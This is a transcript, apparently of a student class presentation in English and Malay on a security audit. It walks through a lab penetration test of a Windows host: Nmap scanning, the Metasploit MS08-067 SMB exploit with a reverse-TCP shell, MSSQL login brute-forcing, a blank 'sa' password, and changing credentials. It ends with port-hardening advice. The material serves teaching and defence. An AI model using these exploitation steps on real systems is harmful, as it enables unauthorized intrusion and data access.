Assalamualaikum warahmatullahi wabarakatuh. So, today, our group will present about our problem-based task DFF 50113 Security Audit. So, firstly, I will introduce our group members. First, Muhammad Aiman bin Ramli, metric number 01DDT to 0F1033. Ahmadiyya bin Zawawi, metric number 01DDT to 0F1073. And my name is Amir Ahmad Hakim bin Anwar. Metric card number 01DDT to 0F1078. And lastly, Muhammad Faiz bin Abdul Rahman. Metric number 01DDT to 0F1086. So, firstly, I will talk about the introduction. An audit system usually is a computer program that is designed to assist with the completion of audit procedures. This type of software is purchased by accounting firms, auditors, and internal auditing department. The primary purpose of audit system is collect data, perform a random data sample for each audit procedure, track activity, and assist in the creation of the final report. There is a wide range of audit system available, from a small system designed for a medium-sized business to a large enterprise system for use by multinational organizations. Methodology. A penetration tester needs to be familiar with different hacking techniques and have an in-depth network security knowledge. They must also know how to use various tools, assess the target system security posture. Three-phase penetration testing. Phase 1 is about pre-engagement. Phase 2 is about engagement. And lastly, phase 3 is about a post-engagement. Pre-engagement. Firstly, about the planning and scoping. The penetration test provider is usually involved in defining the scope of the testing. It should include the test plan as well as the level of intrusion permitted when vulnerability are discovered. Next, information gathering and analysis. Following planning and scoping, the next phase is to gather information on the system or network to be tested. Next is the phase 2, which is engagement. Firstly, vulnerability analysis. During this step, the penetration tester deploys a probe on the target network, collect preliminary data, and analyze the result to identify exploitation routes. Penetration testing. During this step, a penetration tester searches target properties for vulnerabilities using automated tools. These programs typically have their own file that contain information about the most frequent vulnerabilities. Lastly, active intrusion attempt phase. Once a penetration tester has breached the security perimeter or exploit a target device, they can use a malware or another way to gain conditional access, much like a true advanced persistent threat. Post-engagement. Following penetration testing, both tester and client must complete a number of tasks, which is a post-test implementation and risk identification, and lastly, report on penetration testing. So, about the network assessment, which is network architecture review and device security, OpenPort. OpenPort become a dangerous when legitimate services are exploited through security vulnerability or malicious services are introduced to a system via malware or social engineering. Cybercriminals can use this service in conjunction with OpenPort to gain unauthorized access to sensitive data. So, Amin Dina will continue the presentation about how to exploit the port 445. Thank you. Okay, so thank you Amirul for presentation, and so I will continue my presentation. Okay, so kita akan tunjuk cara-cara untuk exploit port 445. So first sekali kita perlu configure network configuration kita dengan type network configuration, and then kita click wire connection 1, and
and then pergi ke IPv4 setting, kita akan set method kita kepada manual, and then IP address kita perlu mengikut range dalam soalan. So range yang kita letakkan adalah 192.168.100 dan di belakang dia menambahkan 10. So netmask 24. Selepas kita siap letak benda ni, kita akan save dan kita restart kita punya KAI Linux. Okay, selepas membuat benda tersebut, kita akan cuba cari IP address yang ada dalam range ataupun network kita. So kita akan menggunakan sudo net discover and then IP address punya range. Okay, dekat sini kita boleh nampak ada satu IP 192.168.100.1 di mana IP address ini sangat dekat dengan IP address kita. So kita akan scan menggunakan Nmap. Untuk menggunakan Nmap, kita akan menggunakan command Nmap IP address target machine kita iaitu 192.168.100.1 -p -s v besar, and then kita akan dapat beberapa port yang open. So kat sini contoh-contoh port yang ada, port 21, port 25, port 53 dan lain-lain. So untuk kita melakukan exploit port 445, kita nampak kat sini port 445 dalam state open dan version dia adalah Microsoft Windows 2003 or 2008 Microsoft-DS. So kita cuba menggunakan MSF console dengan type di terminal kita MSF console. Lepas kita type MSF console, kita search exploit yang ada dalam MSF framework iaitu kita cuba MS08-067. So dia akan tunjuk modul yang matching and then exploit yang kita boleh lakukan. Okay, dekat sini kita boleh nampak ada exploit /windows/smb mss08 _067_netfp dan date dia 2008 bulan 10 28 bulan. So kita akan gunakan exploit ni. Untuk menggunakan exploit ini, kita perlu use exploit and then kita slash dengan windows /smb/ms08_067_netfp. So dia kata dekat sini no payload configure defaulting windows /interpreter/reverse_tcp. So untuk kita betulkan payload ni, kita kena set payload windows /shell/reverse_tcp and then kita akan tunjukkan option yang ada. Okay, so dekat sini kita rhost kita kosong and then kita punya lhost pun salah. So kita perlu tukar rhost, kita perlu letakkan remote host kita dan juga local host kita. So remote host adalah target machine punya IP address. So kat sini kita letak set rhost target IP address target machine. So ada lhost kita letak IP address kali Linux kita. And then kita type exploit and then tekan enter. So dia akan keluar started reverse TCP handler sampai command shell session 1 open. Bila dia dah open, kita tekan enter. So dekat sini kita dah masuk dalam Windows yang iaitu target machine kita. So untuk kita tahu beberapa maklumat tentang target machine kita, contohnya kita nak tahu IP address target machine kita nak pastikan sama ada betul atau tak, dia type IP config and then dia akan tunjuk IP address target machine tersebut. Contohnya kat sini IP address adalah 192.168.100.1.
Okay, kita nak mendalam lagi, kita nak tahu sistem ni jenis apa. So kita type sistem info. So dia akan keluarkan jenis-jenis sistem kita seperti OS name, OS version, OS manufacturer dan lain-lain. So itu saja cara-cara untuk kita exploit port 445. So Faiz Rahman akan meneruskan presentation. So sekian, terima kasih. Okay, thank you Milena. Okay, untuk part yang seterusnya saya akan continue untuk exploit port 1433. Okay, yang first sekali kita masuk ke MSF console dan type command use scanner /mssql/ping. Okay, lepas tu dah masuk dalam tu, kita setkan rhost dia pada ping IP address 192.168.100.1. Kemudian setkan thread je kepada 20 dan exploit. Okay, command ni untuk kita nak dapatkan information pasal dia punya server name, macam kita boleh dapat kat sini win 2003. Lepas tu kita boleh dapatkan instance name dia MSSQL server dan banyak lagi kat sini kita boleh dapat dia punya TCP semua. Okay, untuk step seterusnya kita back dan kita guna balik macam step atas tadi, use scanner /mssql/mssql login. Dan kita setkan pass file user share set src fasttrack /wordlist.txt. Jadi dekat sini kita setkan rhost kembali kepada 192.168.100.1. tapi kita setkan thread sekali ni pada 10. Dan lepas tu kita exploit. Okay, yang ni adalah cara untuk macam mana kita nak brute force menggunakan MS SQL. Okay, untuk part yang seterusnya kita back dan pergi pada use window /mssql/mssql payload. Lepas itu setkan selepas kita enter tu, kita boleh nampak kat sini no payload configure. Okay, untuk setkan payload tu kita set payload windows /shell/reverse_tcp. Jadi dekat sini lepas kita enter, payload dah disetkan. Jadi dekat sini kita boleh type option untuk lihat kita punya payload option. Macam kat sini ada lhost 127.0.0.1. Lepas tu kat sini ada lport 4444. Untuk step seterusnya kita boleh type command set lhost untuk setkan lhost kita 192.168.10. Lepas tu setkan rhost kita kepada 192.168.100.1. Kemudian kita exploit. Dan tunggu untuk berapa second. Jadi kat sini kita dah berjaya masuk dalam Windows System 32. Okay, first kita boleh check kita punya IP. Kita type IP config. Dekat sini boleh nampak kita punya IP address 192.168.100.1.
dan subnet mask untuk Windows ni 255.255.255.0. Okay, untuk nak tahu kita dah berjaya masuk dulu, kita boleh type UMI. Di sini kita boleh nampak kita dah dapat masuk untuk jadi administrator. Okay, untuk step seterusnya kita boleh type OSQL. Kat sini ada beberapa option untuk kita nak dapat, macam boleh login ID, first name, banyak lagi. Okay, dekat sini kita akan cuba login untuk jadi host. Kita type product.u.sa. Okay, dekat sini kita dah boleh login sebab yang ni tak ada password. Kita boleh type untuk tengok database dia. Select all from sys databases. Untuk runkan command ni kita perlu type go. Okay, dekat sini kita boleh nampak beberapa database yang attacker boleh dapat. Okay, selain tu kita boleh juga buat, kita boleh juga tukarkan password atau setkan password untuk Windows ni. Jadi kita boleh type command OSQL. Lepas tu masukkan dia punya command exec $s password null. Kat sini kita boleh masukkan password yang kita nak. Contoh macam saya masukkan 1, 2, 3, 4. Lepas tu tutup kurungan. Dekat sini kita perlu masukkan dia punya login username. Type go, enter. Dan kita boleh nampak kat sini password dia dah change. So, kita boleh cuba untuk login balik. Kita buat command sama OSQL. So, masukkan, kalau kita enter, kita boleh nampak kat sini login failed sebab kita dah setkan password tadi. So, kita boleh masukkan password kembali. Satu, dua, tiga, empat. Dekat sini kita dah berjaya masuk. Kita boleh buat balik command yang macam tu. Dekat sini kita boleh nampak kita dah berjaya masuk dengan password yang telah kita set tadi. Okay, itu sahaja daripada saya. Dan seterusnya saya akan pass kepada Aimar Ramli. Sekarang saya akan teruskan dengan part recommended. The step to securing risky ports is scanning your IT stack, including application and any network connected device, to learn what ports are open and whether the configuration are appropriate. Second, learn what processor or protocols are using the port. If your system admin finds a process or protocol that PC does not recognize, it might indicate a security vulnerability. Third, close the risky spots, both the SANS and intrusion detection FAQ, FAQ and the Internet Sign Number Authority offer information about what service use which ports and which port cyber criminal target. And last conclusion,
Regular vulnerability assessment are an essential part to successfully managing your network security. They help mitigate security breach by showing you which areas of your network need patching and where to start first. You should perform quarterly vulnerability assessment, and whenever there are changes made to the system, if you choose to partner with an IT organization to perform your scans, you will have access to its team expertise in planning, performing, and analyzing the results. So you can ensure you are not missing anything. Attending to your company's security vulnerabilities before claiming cyber criminals exploit them makes business operation more efficient, provides a streamlined experience for your customers, and increase profitability. Thank you. That's all from us. Thank you.